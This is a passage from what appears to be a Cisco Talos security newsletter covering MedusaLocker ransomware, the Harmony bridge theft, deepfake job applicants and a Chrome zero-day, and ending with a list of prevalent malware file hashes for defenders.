
This is by no means an easy decision to make, it’s a fine line all cybersecurity defenders must continually walk. But as we’ve pointed out several times, cybersecurity is a team sport. Prior to publishing any blog post, we take several steps to make sure everyone is on the same page, including victim notifications and information sharing with our partners like the Cyber Threat Alliance. I think we should all play on the same team and provide our teammates with as much information as possible so they’re ready for game time. To continue the analogy, information sharing with the public allows under-resourced teams to take action to defend themselves without needing to further strain their budgets and people.  

It does us no good to either keep this information to ourselves and try to go out on our own and single-handedly defeat these threat actors because that’s never going to work. And it also doesn’t make sense to be super competitive. We always seek to protect our customers first and foremost, and that includes responsible disclosure policies from our vulnerability management team to our threat researchers. Our intelligence pushes research and defenders forward, and we will always seek to arm them with as much information as possible.  

**The one big thing **

U.S. federal agencies unveiled a great deal about the MedusaLocker ransomware group last week with a joint advisory on the attackers’ operations. The U.S. Cybersecurity Infrastructure Security Agency, FBI and others shared several IOCs related to the actor, warning that they’ve spotted a recent uptick in MedusaLocker’s operations. MedusaLocker gains access to victim devices through vulnerable Remote Desktop Protocol (RDP) configurations or with malicious phishing and spam emails. Once on the targeted system, the attackers encrypt a victim’s files and await ransom payment while propagating across the network. 

> **Why do I care? **Cisco Talos first observed MedusaLocker operating in 2019. Clearly, the group has only expanded its operations since then and is now part of the massive ransomware-as-a-service industry that features several major threat actors. This group made its name by targeting health care organizations during the COVID-19 pandemic, but CISA’s advisory states any industry could be a target. The advisory includes new information on potential mitigations for this malware family, along with known IOCs to block associated with the group.   
> **So now what? **In addition to implementing the mitigations outlined in the advisory, Cisco Secure also has several options available to defend against this attack. There are multiple Snort rules that detect this ransomware’s activity along with several ClamAV signatures. As with all ransomware activity, it’s important to have physical backups on hand in the event of an attack so you can recover quickly. And you can always be prepared for the worst with a Cisco Talos Incident Response plan and/or playbook. 

**Other news of note**

The North Korean state-sponsored actor Lazarus Group is suspected to be behind a recent $100 million cryptocurrency theft. Members of the group allegedly exploited the Harmony Horizon Bridge software that allows users to trade virtual currency between the Harmony blockchain and other blockchains. Attackers obtained username and passwords of Harmony employees that they then used to break into the bridge and deploy several money laundering techniques to hide their actions. The tactics in this case are similar to another attack in April in which attackers stole $600 million from Ronin Bridge. (Bloomberg, Fortune) 

Bad actors are creating fake job applications and attending virtual interviews with deepfake videos. A new warning from the FBI states the adversaries are trying to obtain contractor-level jobs at technology companies, likely to steal sensitive information or make money illegitimately. These fake applicants use stolen identities, fake videos and doctored voices during the application process, including adding in what seem like normal human coughing, sneezing and blinking. The FBI recommends that recruiters or hiring managers look out for telltale signs of deepfake videos like sounds that do not line up with the video on the screen or unnatural lip movements. (TechCrunch, Gawker) 

Google is warning of a high-severity vulnerability in the Chrome web browser for Android that is actively being exploited in the wild. CVE-2022-2294 is a heap buffer overflow bug that, if exploited, could lead to denial-of-service attacks or arbitrary code execution. The company released a security update to patch the vulnerability this week. This update also includes fixes for another high-severity vulnerability (CVE-2022-2295) and an unspecified internal issue discovered. This is the fourth zero-day vulnerability to pop up in Chrome this year. (Dark Reading, Decipher) 

**Can’t get enough Talos? **

*   Talos Takes Ep. #102: Unmasking ransomware groups on the dark web
*   Researcher Spotlight: Around the security world and back again with Nick Biasini
*   Researchers Share Techniques to Uncover Anonymized Ransomware Sites on Dark Web

  

**Upcoming events where you can find Talos **

**A New HOPE** (July 22 - 24, 2022)  
New York City 

**BlackHat** **U.S.** (Aug. 6 - 11, 2022)  
Las Vegas, Nevada 

**DEF CON U.S.** (Aug. 11 - 14, 2022)  
Las Vegas, Nevada 

**Most prevalent malware files from Talos telemetry over the past week  **

**MD5:** 2915b3f8b703eb744fc54c81f4a9c67f   

**Typical Filename:** VID001.exe   

**Claimed Product:** N/A   

**Detection Name:** Win.Worm.Coinminer::1201 

**MD5:** 2c8ea737a232fd03ab80db672d50a17a    

**Typical Filename:** LwssPlayer.scr    

**Claimed Product:** 梦想之巅幻灯播放器    

**Detection Name:** Auto.125E12.241442.in02    

**MD5:** 10f1561457242973e0fed724eec92f8c    

**Typical Filename:** ntuser.vbe    

**Claimed Product:** N/A    

**Detection Name:** Auto.1A234656F8.211848.in07.Talos   

**MD5:** a7742a6d7d8b39f1a8cdf7f0b50f12bb    

**Typical Filename:** wrsanvs.exe  

**Claimed Product:** N/A      

**Detection Name:** W32.Auto:91e994229a.in03.Talos

Tag

#intel